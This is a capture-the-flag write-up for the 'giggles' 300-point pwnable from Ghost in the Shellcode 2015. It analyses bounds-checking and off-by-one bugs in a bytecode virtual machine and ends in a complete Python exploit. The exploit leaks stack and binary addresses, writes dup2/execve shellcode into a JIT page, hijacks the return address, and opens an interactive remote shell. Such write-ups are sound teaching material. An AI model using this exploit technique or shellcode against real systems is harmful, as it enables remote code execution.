giggles Ghost in the Shellcode 2015 This was a 300 point pwnable for which we are given the giggles binary (Linux ELF-64), the source for the server (giggles.c) and a client to interact with the binary (client.py). Other than some stack layout specifics, the source tells us everything we need to know to exploit the server. giggles is a virtual machine that supports 7 byte codes: #define OP_ADD 0 #define OP_BR 1 #define OP_BEQ 2 #define OP_BGT 3 #define OP_MOV 4 #define OP_OUT 5 #define OP_EXIT 6 BASIC OPERATION On initial connect, a global pointer named JIT is assigned the address of a page of executable memory so ROP may not be necessary if we can get our shellcode loaded into this page and transfer to it. The main loop supports 3 type of operations: 0. Upload a bytecode function (up to 4096 bytes). A function may contain a maximum of 30 bytecode operations, is initially marked as unverified and gets copied into the next available slot in the global funcs array which is dimensioned to hold 64 function structures and which can be overflowed, perhaps in an exploitable manner, but not explored for this exploit. 1. Perform bytecode verification on an existing function 2. Run an existing function, which must have been successfully verified EXECUTION DESCRIBED ALONG WITH THE BUG WE USE When a function gets executed, it gets its own set of 10 registers that are initially zeroed. An array of arguments is also passed into the function. The number of arguments taken by the function is specified as part of the function object. A maximum of 10 arguments are allowed and the arguments are copied into registers beginning with R[0] prior to executing any bytecode. A program counter is maintained and initialized to zero. The execute function will execute a maximum of 100 operations. Keep in mind that a function object may contain a maximum of 30 bytecode operations. We will take advantage of the fact that no bounds checking is performed on the program counter for sequential operations. As a result, the program counter can run off the end of one function's bytecode array and into the following function. Thus, once we get to bytecode[30] we are fetching from memory occupied by the next function. All we need to do is craft that function so that its header fields, and eventually the bytecode array, form a valid continuation of the previous function's bytecode array. BYTECODE OPERATIONS DESCRIBED In order to craft a useful function, its necessary to understand a little bout the bytecode verifier and the checks performed when a new function is added. The simplistic nature of the instruction set makes the bytecode verifiers job pretty simple. A summary of the byte code follows: ADD - add one register to another MOV - move one register to another BR - set the program counter to the immediate operand BEQ - compare two registers and branch to the immediate operand if equal BGT - compare two registers and branch to the immediate operand if greater than OUT - output the contents of a register using a %x format THE BYTECODE VERIFIER The bytecode verifier performs the following checks: ADD/MOV - fail if either register number is > 10 OUT - fail if the named register is > 10 BR - fail if the target is > the function's declared number of instructions BEQ/BGT - fail if the named registers are > 10, fail if the target is > the function's declared number of instructions STACK FRAME OF executeFunction -0000000000000094 num_args dd ? -0000000000000090 args dq ? ; offset -0000000000000088 f dq ? ; offset -0000000000000080 i dd ? -000000000000007C reg_pc dd ? -0000000000000078 instr_count dd ? -0000000000000074 done dd ? -0000000000000070 result dq ? ; offset -0000000000000068 curr_op dq ? ; offset -0000000000000060 registers dd 10 dup(?) ... -0000000000000030 buf db 10 dup(?) ; buffer for OUT ... -0000000000000018 canary dq ? ... +0000000000000000 s db 8 dup(?) ; saved rbp +0000000000000008 r db 8 dup(?) ; return to handleConnection ADDITIONAL BUGS Two problems present themselves, first, due to the strictly greater than checks, the virtual machine effectively has 11 registers, 0-10. The manner in which the registers are allocated in executeFunction is shown below. The 11th register does not present an opportunity to overwrite anything interesting, but it does present a potential leak via OUT as it is not zeroed on entry to executeFunction, only registers 0-9 are zeroed. The second problem is that jump targets are also checked with a strictly greater than check allowing jumps to bytecode[num_ops], an off by one error. This is only practical when we upload a function containing 30 instructions which positions the last instruction in the bytecode array adjacent to the next function that gets loaded. Jumping to bytecode[30] in this case, treats the first bytes of the subsequent function as a bytecode which gives us essentially the same bug described above where we simply execute off the end of the bytecode array because there are no bounds checks on the program counter during execution. CRAFTING OUR PAYLOAD Our approach is to upload a 30 instruction function and verify it. We the upload a second function that we will not verify, the last instruction in the first function is adjacent to the header of the second function. Finally we execute the first function and allow execution to run off the end of the function into the second function. In order for this to work, we need the header of the second function to both describe a valid function and double as a valid instruction. The relevant data structures are shown here (both are packed): struct operation { struct function { uint16_t opcode; uint16_t num_ops; uint64_t operand1; uint16_t num_args; uint64_t operand2; uint8_t verified; uint64_t operand3; struct operation bytecode[MAX_OPS]; //starts at offset 5 }; //26 bytes }; So we see that the num_ops field in the function header will become the opcode field when viewed as a bytecode, this restricts us to the range 0-6, but 6 is EXIT so effectively 0-5. Since this value also dictates the size of the uploaded function we attempt to use the largest value possible which is 5 / OUT. We then need 3 64-bit operands that are both valid for out and keep the function valid. Fortunately, no other fields within the function body are checked when the function is uploaded. The only side effect is that the verified field will be set to zero. Keeping in mind that we do not need to verify the second function, we can output a wide range of registers with this first instruction. Registers are 32-bits so if we want to leak 64-bits we need two OUT operations of adjacent registers. The first fake instruction extends 21 bytes into the bytecode array of the second function. The add function checks verify that we send the proper amount of information so we need to send exactly 5(sizeof(function header)) + 5*sizeof(operation) = 135 bytes. Less the 26 bytes dedicated to the first fake instruction we have 109 bytes remaining. This allows us to send 4 additional instructions (104 bytes) and 5 bytes of padding. We'll use the first 2 of the 5 padding bytes to hole the EXIT opcode to allow our function to terminate properly. With the remaining 4 instructions we can get creative as the operand values in those instructions need never get verified. With this in mind we proceed as follows: 1. Create and upload a 30 instruction / 4 argument function (function 0) 2. Upload a 5 instruction to read registers 24/25(saved rbp) and registers 26/27 (saved rip) to leak stack and executable addresses (function 1) 3. Execute function 0 to leak desired registers. 4. Derive stack address of registers array from leaked rbp (rbp - 0x58 - 0x68) 5. Derive address of saved JIT pointer from leaked rip (rip - 0x1EFD + 0x20F5C0) 6. Compute "register number" of saved JIT pointer to leak address of mapped executable page (&jitptr - ®isters) / 4 7. Upload another copy of function 0 as function 2. 8. Upload a new function to leak the contents of the JIT pointer. 9. Execute function 2 to leak the JIT pointer. 10. Compute the "register number" for the JIT page. 11. Choose our payload (dup sock / shell) and pad to a multiple of 16 bytes 12. For each 16 byte chunk, split into 4, 4-byte values to use as operands to MOV instructions. Upload a copy of function 0 as function 4, 6, 8, ... Upload a fake instruction block with 4 MOVs to move our payload data into the jit page as function 5, 7, 9, ... Execute functions 4, 6, 8, ... until out entire payload resides on the JIT page 13. Upload a copy of function 0 14. Upload a fake instruction block to move the address of the JIT block into registers 26/27 (saved rip). This causes executeFunction to return into the JIT page. 15. Profit. Exploit code (highly modified client.py) follows: ---------------------------------------------------------------------------------- #!/usr/bin/python import socket import struct import sys import os TYPE_ADDFUNC = 0 TYPE_VERIFY = 1 TYPE_RUNFUNC = 2 OP_ADD = 0 OP_BR = 1 OP_BEQ = 2 OP_BGT = 3 OP_MOV = 4 OP_OUT = 5 OP_EXIT = 6 def createOperation(op, opnd1, opnd2, opnd3): operation = struct.pack("H", op) operation += struct.pack("Q", opnd1) operation += struct.pack("Q", opnd2) operation += struct.pack("Q", opnd3) return operation def createFunction(num_ops, num_args, bytecode): function = struct.pack("H", num_ops) function += struct.pack("H", num_args) function += struct.pack("B", 0) function += bytecode return function def addFunction(sockfd, function): packet = struct.pack("B", TYPE_ADDFUNC) packet += struct.pack("H", len(function)) packet += function sockfd.send(packet) sockfd.recv(2) if (struct.unpack("I", sockfd.recv(4))[0] != 0): print "add error" sys.exit(0); def verifyFunction(sockfd, idx): packet = struct.pack("B", TYPE_VERIFY) packet += struct.pack("H", 2) packet += struct.pack("H", idx) sockfd.send(packet) sockfd.recv(2) if (struct.unpack("I", sockfd.recv(4))[0] != 0): print "verify error" sys.exit(0); def runFunction(sockfd, idx, args, wait = True): packet = struct.pack("B", TYPE_RUNFUNC) packet += struct.pack("H", 4 + 4 * len(args)) packet += struct.pack("H", idx) packet += struct.pack("H", len(args)) for arg in args: packet += struct.pack("I", arg) sockfd.send(packet) if wait: outlen = struct.unpack("H", sockfd.recv(2))[0] if (outlen != 0): return sockfd.recv(outlen) return "" sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sockfd.connect((sys.argv[1], int(sys.argv[2]))) #do nothing function that executes 30 instructions to run off end #we use the arguments later for out write operations operations = createOperation(OP_MOV, 0, 0, 0)*30 fillfunction = createFunction(30, 4, operations) addFunction(sockfd, fillfunction) verifyFunction(sockfd, 0) #first function runs into this fake function #which is basically union (function f; operation op[]} #opcode is interpreted as num_ops so limits our size #since we need a valid opcode #need to round size up to a valid 5 op function size #so we append the exit opcode to terminate the function #no need to verify this function so we can index outside the #register array! operations = createOperation(OP_OUT, 0, 0, 0) operations += createOperation(OP_OUT, 25, 0, 0) #index of saved rbp operations += createOperation(OP_OUT, 24, 0, 0) operations += createOperation(OP_OUT, 27, 0, 0) #index of saved rip operations += createOperation(OP_OUT, 26, 0, 0) operations += "\x06\x00\x00\x00\x00" addFunction(sockfd, operations) addFunction(sockfd, fillfunction) verifyFunction(sockfd, 2) leak = runFunction(sockfd, 0, [0, 0, 0, 0]) print leak rbp = 0 for i in leak.split()[1:3]: rbp = (rbp << 32) + int(i, 16) rip = 0 for i in leak.split()[3:]: rip = (rip << 32) + int(i, 16) print "0x%x, 0x%x" % (rbp, rip) binbase = rip - 0x1EFD jitptr = binbase + 0x20F5C0 registers = rbp - 0x58 - 0x68 delta = jitptr - registers lowjit = delta / 4 highjit = lowjit + 1 #with binary base address in hand leak the JIT pointer to the executable page operations = createOperation(OP_BGT, 0, 0, 0) operations += createOperation(OP_OUT, highjit & 0xffffffffffffffff, 0, 0) operations += createOperation(OP_OUT, lowjit & 0xffffffffffffffff, 0, 0) operations += "\x06\x00\x00\x00\x00" addFunction(sockfd, operations) leak = runFunction(sockfd, 2, [0, 0, 0, 0]) print leak jit = 0 for i in leak.split(): jit = (jit << 32) + int(i, 16) print "0x%x" % (jit) payload = "\x6a\x04\x5f\x6a\x02\x5e\x6a\x21\x58\x0f\x05\x48\xff\xce\x79\xf6" payload += "\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7\x50" payload += "\x48\x89\xe2\x57\x48\x89\xe6\xb0\x3b\x0f\x05" newlen = (len(payload) + 15) & ~15 payload = (payload + "A"*15)[:newlen] print len(payload) currfunc = 4 jitidx = ((jit - registers) / 4) & 0xffffffffffffffff for i in range(0, len(payload), 16): addFunction(sockfd, fillfunction) verifyFunction(sockfd, currfunc) #use an OP_MOV based stub to write our payload into JIT block operations = createOperation(OP_OUT, 0, 0, 0) operations += createOperation(OP_MOV, jitidx, 0, 0) operations += createOperation(OP_MOV, jitidx+1, 1, 0) operations += createOperation(OP_MOV, jitidx+2, 2, 0) operations += createOperation(OP_MOV, jitidx+3, 3, 0) operations += "\x06\x00\x00\x00\x00" jitidx += 4 addFunction(sockfd, operations) vals = struct.unpack("<4I", payload[i:i+16]) runFunction(sockfd, currfunc, vals) currfunc += 2 addFunction(sockfd, fillfunction) verifyFunction(sockfd, currfunc) #overwrite save return address in executeFunction to return to JIT buffer operations = createOperation(OP_BGT, 0, 0, 0) operations += createOperation(OP_MOV, 26, 0, 0) operations += createOperation(OP_MOV, 27, 1, 0) operations += "\x06\x00\x00\x00\x00" addFunction(sockfd, operations) #run our function to overwrite return address runFunction(sockfd, currfunc, [jit & 0xffffffff, jit >> 32, 0, 0], False) #talk to shell :) if os.fork(): while 1: b = sockfd.recv(1) sys.stderr.write(b) else: while 1: b = sys.stdin.read(1) sockfd.sendall(b)